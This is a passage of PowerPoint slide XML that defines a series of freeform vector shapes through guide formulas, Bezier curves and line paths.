                      <a:pt x="222" y="315"/>
                      <a:pt x="222" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="313"/>
                      <a:pt x="243" y="308"/>
                      <a:pt x="252" y="301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="262"/>
                      <a:pt x="298" y="171"/>
                      <a:pt x="242" y="97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3" name="Freeform 13116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6157" y="2609"/>
                <a:ext cx="141" cy="159"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 255 w 306"/>
                  <a:gd name="T1" fmla="*/ 308 h 346"/>
                  <a:gd name="T2" fmla="*/ 61 w 306"/>
                  <a:gd name="T3" fmla="*/ 243 h 346"/>
                  <a:gd name="T4" fmla="*/ 50 w 306"/>
                  <a:gd name="T5" fmla="*/ 39 h 346"/>
                  <a:gd name="T6" fmla="*/ 244 w 306"/>
                  <a:gd name="T7" fmla="*/ 104 h 346"/>
                  <a:gd name="T8" fmla="*/ 255 w 306"/>
                  <a:gd name="T9" fmla="*/ 308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6"/>
                  <a:gd name="T17" fmla="*/ 306 w 306"/>
                  <a:gd name="T18" fmla="*/ 346 h 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6">
                    <a:moveTo>
                      <a:pt x="255" y="308"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="346"/>
                      <a:pt x="117" y="317"/>
                      <a:pt x="61" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="169"/>
                      <a:pt x="0" y="77"/>
                      <a:pt x="50" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="0"/>
                      <a:pt x="188" y="29"/>
                      <a:pt x="244" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="178"/>
                      <a:pt x="306" y="269"/>
                      <a:pt x="255" y="308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4" name="Freeform 13117"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6185" y="2640"/>
                <a:ext cx="85" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 155 w 186"/>
                  <a:gd name="T1" fmla="*/ 187 h 211"/>
                  <a:gd name="T2" fmla="*/ 37 w 186"/>
                  <a:gd name="T3" fmla="*/ 148 h 211"/>
                  <a:gd name="T4" fmla="*/ 30 w 186"/>
                  <a:gd name="T5" fmla="*/ 23 h 211"/>
                  <a:gd name="T6" fmla="*/ 148 w 186"/>
                  <a:gd name="T7" fmla="*/ 63 h 211"/>
                  <a:gd name="T8" fmla="*/ 155 w 186"/>
                  <a:gd name="T9" fmla="*/ 187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1"/>
                  <a:gd name="T17" fmla="*/ 186 w 186"/>
                  <a:gd name="T18" fmla="*/ 211 h 2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1">
                    <a:moveTo>
                      <a:pt x="155" y="187"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="211"/>
                      <a:pt x="71" y="193"/>
                      <a:pt x="37" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="102"/>
                      <a:pt x="0" y="47"/>
                      <a:pt x="30" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="0"/>
                      <a:pt x="114" y="18"/>
                      <a:pt x="148" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="108"/>
                      <a:pt x="186" y="164"/>
                      <a:pt x="155" y="18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5" name="Freeform 13118"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6143" y="2324"/>
                <a:ext cx="242" cy="399"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 526"/>
                  <a:gd name="T1" fmla="*/ 0 h 870"/>
                  <a:gd name="T2" fmla="*/ 55 w 526"/>
                  <a:gd name="T3" fmla="*/ 613 h 870"/>
                  <a:gd name="T4" fmla="*/ 2 w 526"/>
                  <a:gd name="T5" fmla="*/ 716 h 870"/>
                  <a:gd name="T6" fmla="*/ 23 w 526"/>
                  <a:gd name="T7" fmla="*/ 799 h 870"/>
                  <a:gd name="T8" fmla="*/ 13 w 526"/>
                  <a:gd name="T9" fmla="*/ 738 h 870"/>
                  <a:gd name="T10" fmla="*/ 59 w 526"/>
                  <a:gd name="T11" fmla="*/ 628 h 870"/>
                  <a:gd name="T12" fmla="*/ 314 w 526"/>
                  <a:gd name="T13" fmla="*/ 713 h 870"/>
                  <a:gd name="T14" fmla="*/ 369 w 526"/>
                  <a:gd name="T15" fmla="*/ 829 h 870"/>
                  <a:gd name="T16" fmla="*/ 526 w 526"/>
                  <a:gd name="T17" fmla="*/ 870 h 870"/>
                  <a:gd name="T18" fmla="*/ 526 w 526"/>
                  <a:gd name="T19" fmla="*/ 124 h 870"/>
                  <a:gd name="T20" fmla="*/ 55 w 526"/>
                  <a:gd name="T21" fmla="*/ 0 h 8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26"/>
                  <a:gd name="T34" fmla="*/ 0 h 870"/>
                  <a:gd name="T35" fmla="*/ 526 w 526"/>
                  <a:gd name="T36" fmla="*/ 870 h 87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26" h="870">
                    <a:moveTo>
                      <a:pt x="55" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="613"/>
                      <a:pt x="55" y="613"/>
                      <a:pt x="55" y="613"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="613"/>
                      <a:pt x="4" y="645"/>
                      <a:pt x="2" y="716"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="786"/>
                      <a:pt x="23" y="799"/>
                      <a:pt x="23" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="778"/>
                      <a:pt x="13" y="758"/>
                      <a:pt x="13" y="738"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="692"/>
                      <a:pt x="27" y="652"/>
                      <a:pt x="59" y="628"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="577"/>
                      <a:pt x="240" y="615"/>
                      <a:pt x="314" y="713"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="750"/>
                      <a:pt x="361" y="791"/>
                      <a:pt x="369" y="829"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="526" y="870"/>
                      <a:pt x="526" y="870"/>
                      <a:pt x="526" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="526" y="124"/>
                      <a:pt x="526" y="124"/>
                      <a:pt x="526" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="526" y="124"/>
                      <a:pt x="79" y="6"/>
                      <a:pt x="55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6" name="Freeform 13119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6226" y="2338"/>
                <a:ext cx="150" cy="376"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 327"/>
                  <a:gd name="T1" fmla="*/ 0 h 818"/>
                  <a:gd name="T2" fmla="*/ 0 w 327"/>
                  <a:gd name="T3" fmla="*/ 567 h 818"/>
                  <a:gd name="T4" fmla="*/ 143 w 327"/>
                  <a:gd name="T5" fmla="*/ 671 h 818"/>
                  <a:gd name="T6" fmla="*/ 203 w 327"/>
                  <a:gd name="T7" fmla="*/ 786 h 818"/>
                  <a:gd name="T8" fmla="*/ 327 w 327"/>
                  <a:gd name="T9" fmla="*/ 818 h 818"/>
                  <a:gd name="T10" fmla="*/ 327 w 327"/>
                  <a:gd name="T11" fmla="*/ 88 h 818"/>
                  <a:gd name="T12" fmla="*/ 0 w 327"/>
                  <a:gd name="T13" fmla="*/ 0 h 8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27"/>
                  <a:gd name="T22" fmla="*/ 0 h 818"/>
                  <a:gd name="T23" fmla="*/ 327 w 327"/>
                  <a:gd name="T24" fmla="*/ 818 h 8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27" h="818">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="567"/>
                      <a:pt x="0" y="567"/>
                      <a:pt x="0" y="567"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="582"/>
                      <a:pt x="106" y="621"/>
                      <a:pt x="143" y="671"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="708"/>
                      <a:pt x="195" y="747"/>
                      <a:pt x="203" y="786"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="327" y="818"/>
                      <a:pt x="327" y="818"/>
                      <a:pt x="327" y="818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="327" y="88"/>
                      <a:pt x="327" y="88"/>
                      <a:pt x="327" y="88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" name="Freeform 13120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6235" y="2347"/>
                <a:ext cx="134" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 685"/>
                  <a:gd name="T1" fmla="*/ 0 h 773"/>
                  <a:gd name="T2" fmla="*/ 0 w 685"/>
                  <a:gd name="T3" fmla="*/ 591 h 773"/>
                  <a:gd name="T4" fmla="*/ 685 w 685"/>
                  <a:gd name="T5" fmla="*/ 773 h 773"/>
                  <a:gd name="T6" fmla="*/ 685 w 685"/>
                  <a:gd name="T7" fmla="*/ 184 h 773"/>
                  <a:gd name="T8" fmla="*/ 0 w 685"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 773"/>
                  <a:gd name="T17" fmla="*/ 685 w 685"/>
                  <a:gd name="T18" fmla="*/ 773 h 7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5" h="773">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="773"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="184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" name="Freeform 13121"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6385" y="2431"/>
                <a:ext cx="263" cy="292"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T1" fmla="*/ 0 h 1503"/>
                  <a:gd name="T2" fmla="*/ 0 w 1356"/>
                  <a:gd name="T3" fmla="*/ 366 h 1503"/>
                  <a:gd name="T4" fmla="*/ 0 w 1356"/>
                  <a:gd name="T5" fmla="*/ 1503 h 1503"/>
                  <a:gd name="T6" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T7" fmla="*/ 1139 h 1503"/>
                  <a:gd name="T8" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T9" fmla="*/ 0 h 15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56"/>
                  <a:gd name="T16" fmla="*/ 0 h 1503"/>
                  <a:gd name="T17" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T18" fmla="*/ 1503 h 150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56" h="1503">
                    <a:moveTo>
                      <a:pt x="1356" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13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" name="Freeform 13122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6385" y="2310"/>
                <a:ext cx="263" cy="192"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1356"/>
                  <a:gd name="T1" fmla="*/ 989 h 989"/>
                  <a:gd name="T2" fmla="*/ 0 w 1356"/>
                  <a:gd name="T3" fmla="*/ 363 h 989"/>
                  <a:gd name="T4" fmla="*/ 711 w 1356"/>
                  <a:gd name="T5" fmla="*/ 175 h 989"/>
                  <a:gd name="T6" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T7" fmla="*/ 0 h 989"/>
                  <a:gd name="T8" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T9" fmla="*/ 626 h 989"/>
                  <a:gd name="T10" fmla="*/ 711 w 1356"/>
                  <a:gd name="T11" fmla="*/ 798 h 989"/>
                  <a:gd name="T12" fmla="*/ 0 w 1356"/>
                  <a:gd name="T13" fmla="*/ 989 h 9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56"/>
                  <a:gd name="T22" fmla="*/ 0 h 989"/>
                  <a:gd name="T23" fmla="*/ 1356 w 1356"/>
                  <a:gd name="T24" fmla="*/ 989 h 98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56" h="989">
                    <a:moveTo>
                      <a:pt x="0" y="989"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="98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" name="Freeform 13123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6517" y="2345"/>
                <a:ext cx="0" cy="121"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 623 h 623"/>
                  <a:gd name="T1" fmla="*/ 0 h 623"/>
                  <a:gd name="T2" fmla="*/ 623 h 623"/>
                  <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 h 623"/>
                  <a:gd name="T7" fmla="*/ 623 h 623"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T3">
                    <a:pos x="0" y="T0"/>
                  </a:cxn>
                  <a:cxn ang="T4">
                    <a:pos x="0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="0" y="T2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="T6" r="0" b="T7"/>
                <a:pathLst>
                  <a:path h="623">
                    <a:moveTo>
                      <a:pt x="0" y="623"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62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1" name="Freeform 13124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6385" y="2380"/>
                <a:ext cx="0" cy="122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 h 624"/>
                  <a:gd name="T1" fmla="*/ 624 h 624"/>
                  <a:gd name="T2" fmla="*/ 0 h 624"/>
                  <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 h 624"/>
                  <a:gd name="T7" fmla="*/ 624 h 624"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T3">
                    <a:pos x="0" y="T0"/>
                  </a:cxn>
                  <a:cxn ang="T4">
                    <a:pos x="0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="0" y="T2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="T6" r="0" b="T7"/>
                <a:pathLst>
                  <a:path h="624">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="624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2" name="Freeform 13125"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6648" y="2310"/>
                <a:ext cx="0" cy="121"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 623 h 623"/>
                  <a:gd name="T1" fmla="*/ 0 h 623"/>
                  <a:gd name="T2" fmla="*/ 623 h 623"/>
                  <a:gd name="T3" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 h 623"/>
                  <a:gd name="T7" fmla="*/ 623 h 623"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T3">
                    <a:pos x="0" y="T0"/>
                  </a:cxn>
                  <a:cxn ang="T4">
                    <a:pos x="0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="0" y="T2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="T6" r="0" b="T7"/>
                <a:pathLst>
                  <a:path h="623">
                    <a:moveTo>
                      <a:pt x="0" y="623"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62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" name="Freeform 13126"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6168" y="2233"/>
                <a:ext cx="467" cy="114"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1015 w 1015"/>
                  <a:gd name="T1" fmla="*/ 127 h 250"/>
                  <a:gd name="T2" fmla="*/ 636 w 1015"/>
                  <a:gd name="T3" fmla="*/ 25 h 250"/>
                  <a:gd name="T4" fmla="*/ 543 w 1015"/>
                  <a:gd name="T5" fmla="*/ 2 h 250"/>
                  <a:gd name="T6" fmla="*/ 636 w 1015"/>
                  <a:gd name="T7" fmla="*/ 25 h 250"/>
                  <a:gd name="T8" fmla="*/ 636 w 1015"/>
                  <a:gd name="T9" fmla="*/ 25 h 250"/>
                  <a:gd name="T10" fmla="*/ 517 w 1015"/>
                  <a:gd name="T11" fmla="*/ 3 h 250"/>
                  <a:gd name="T12" fmla="*/ 56 w 1015"/>
                  <a:gd name="T13" fmla="*/ 124 h 250"/>
                  <a:gd name="T14" fmla="*/ 0 w 1015"/>
                  <a:gd name="T15" fmla="*/ 198 h 250"/>
                  <a:gd name="T16" fmla="*/ 257 w 1015"/>
                  <a:gd name="T17" fmla="*/ 176 h 250"/>
                  <a:gd name="T18" fmla="*/ 531 w 1015"/>
                  <a:gd name="T19" fmla="*/ 250 h 250"/>
                  <a:gd name="T20" fmla="*/ 1015 w 1015"/>
                  <a:gd name="T21" fmla="*/ 127 h 2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15"/>
                  <a:gd name="T34" fmla="*/ 0 h 250"/>
                  <a:gd name="T35" fmla="*/ 1015 w 1015"/>
                  <a:gd name="T36" fmla="*/ 250 h 25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15" h="250">
                    <a:moveTo>
                      <a:pt x="1015" y="127"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="25"/>
                      <a:pt x="544" y="2"/>
                      <a:pt x="543" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                      <a:pt x="636" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="628" y="23"/>
                      <a:pt x="526" y="0"/>
                      <a:pt x="517" y="3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25" y="133"/>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="176"/>
                      <a:pt x="257" y="176"/>
                      <a:pt x="257" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="250"/>
                      <a:pt x="531" y="250"/>
                      <a:pt x="531" y="250"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1015" y="12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4" name="Freeform 13127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6168" y="2290"/>
                <a:ext cx="244" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 149 w 531"/>
                  <a:gd name="T1" fmla="*/ 23 h 198"/>
                  <a:gd name="T2" fmla="*/ 56 w 531"/>
                  <a:gd name="T3" fmla="*/ 0 h 198"/>
                  <a:gd name="T4" fmla="*/ 0 w 531"/>
                  <a:gd name="T5" fmla="*/ 74 h 198"/>
                  <a:gd name="T6" fmla="*/ 471 w 531"/>
                  <a:gd name="T7" fmla="*/ 198 h 198"/>
                  <a:gd name="T8" fmla="*/ 531 w 531"/>
                  <a:gd name="T9" fmla="*/ 126 h 198"/>
                  <a:gd name="T10" fmla="*/ 149 w 531"/>
                  <a:gd name="T11" fmla="*/ 23 h 1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31"/>
                  <a:gd name="T19" fmla="*/ 0 h 198"/>
                  <a:gd name="T20" fmla="*/ 531 w 531"/>
                  <a:gd name="T21" fmla="*/ 198 h 19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31" h="198">
                    <a:moveTo>
                      <a:pt x="149" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="0"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="56" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="9"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="471" y="198"/>
                      <a:pt x="471" y="198"/>
                      <a:pt x="471" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="531" y="126"/>
                      <a:pt x="531" y="126"/>
                      <a:pt x="531" y="126"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="149" y="2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5" name="Freeform 13128"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6622" y="2287"/>
                <a:ext cx="27" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 59"/>
                  <a:gd name="T1" fmla="*/ 50 h 90"/>
                  <a:gd name="T2" fmla="*/ 1 w 59"/>
                  <a:gd name="T3" fmla="*/ 9 h 90"/>
                  <a:gd name="T4" fmla="*/ 34 w 59"/>
                  <a:gd name="T5" fmla="*/ 57 h 90"/>
                  <a:gd name="T6" fmla="*/ 58 w 59"/>
                  <a:gd name="T7" fmla="*/ 90 h 90"/>
                  <a:gd name="T8" fmla="*/ 58 w 59"/>
                  <a:gd name="T9" fmla="*/ 5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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 90"/>
                  <a:gd name="T17" fmla="*/ 59 w 59"/>
                  <a:gd name="T18" fmla="*/ 90 h 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9" h="90">
                    <a:moveTo>
                      <a:pt x="58" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="19"/>
                      <a:pt x="32" y="0"/>
                      <a:pt x="1" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9"/>
                      <a:pt x="18" y="34"/>
                      <a:pt x="34" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="74"/>
                      <a:pt x="58" y="90"/>
                      <a:pt x="58" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="77"/>
                      <a:pt x="59" y="62"/>
                      <a:pt x="58" y="5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" name="Freeform 13129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6411" y="2291"/>
                <a:ext cx="237" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 461 w 517"/>
                  <a:gd name="T1" fmla="*/ 1 h 202"/>
                  <a:gd name="T2" fmla="*/ 460 w 517"/>
                  <a:gd name="T3" fmla="*/ 0 h 202"/>
                  <a:gd name="T4" fmla="*/ 0 w 517"/>
                  <a:gd name="T5" fmla="*/ 122 h 202"/>
                  <a:gd name="T6" fmla="*/ 56 w 517"/>
                  <a:gd name="T7" fmla="*/ 202 h 202"/>
                  <a:gd name="T8" fmla="*/ 517 w 517"/>
                  <a:gd name="T9" fmla="*/ 81 h 202"/>
                  <a:gd name="T10" fmla="*/ 461 w 517"/>
                  <a:gd name="T11" fmla="*/ 1 h 2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17"/>
                  <a:gd name="T19" fmla="*/ 0 h 202"/>
                  <a:gd name="T20" fmla="*/ 517 w 517"/>
                  <a:gd name="T21" fmla="*/ 202 h 20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17" h="202">
                    <a:moveTo>
                      <a:pt x="461" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="460" y="0"/>
                      <a:pt x="460" y="0"/>
                      <a:pt x="460" y="0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56" y="202"/>
                      <a:pt x="56" y="202"/>
                      <a:pt x="56" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="517" y="81"/>
                      <a:pt x="517" y="81"/>
                      <a:pt x="517" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="517" y="49"/>
                      <a:pt x="492" y="10"/>
                      <a:pt x="461" y="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" name="Freeform 13130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6385" y="2347"/>
                <a:ext cx="52" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 113"/>
                  <a:gd name="T1" fmla="*/ 45 h 91"/>
                  <a:gd name="T2" fmla="*/ 57 w 113"/>
                  <a:gd name="T3" fmla="*/ 0 h 91"/>
                  <a:gd name="T4" fmla="*/ 57 w 113"/>
                  <a:gd name="T5" fmla="*/ 0 h 91"/>
                  <a:gd name="T6" fmla="*/ 57 w 113"/>
                  <a:gd name="T7" fmla="*/ 0 h 91"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 73 h 91"/>
                  <a:gd name="T10" fmla="*/ 113 w 113"/>
                  <a:gd name="T11" fmla="*/ 80 h 91"/>
                  <a:gd name="T12" fmla="*/ 105 w 113"/>
                  <a:gd name="T13" fmla="*/ 45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3"/>
                  <a:gd name="T22" fmla="*/ 0 h 91"/>
                  <a:gd name="T23" fmla="*/ 113 w 113"/>
                  <a:gd name="T24" fmla="*/ 91 h 9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3" h="91">
                    <a:moveTo>
                      <a:pt x="105" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="24"/>
                      <a:pt x="77" y="6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25" y="9"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="91"/>
                      <a:pt x="82" y="87"/>
                      <a:pt x="113" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="69"/>
                      <a:pt x="110" y="57"/>
                      <a:pt x="105" y="4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" name="Freeform 13131"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6391" y="2664"/>
                <a:ext cx="48" cy="46"/>
              </a:xfrm>
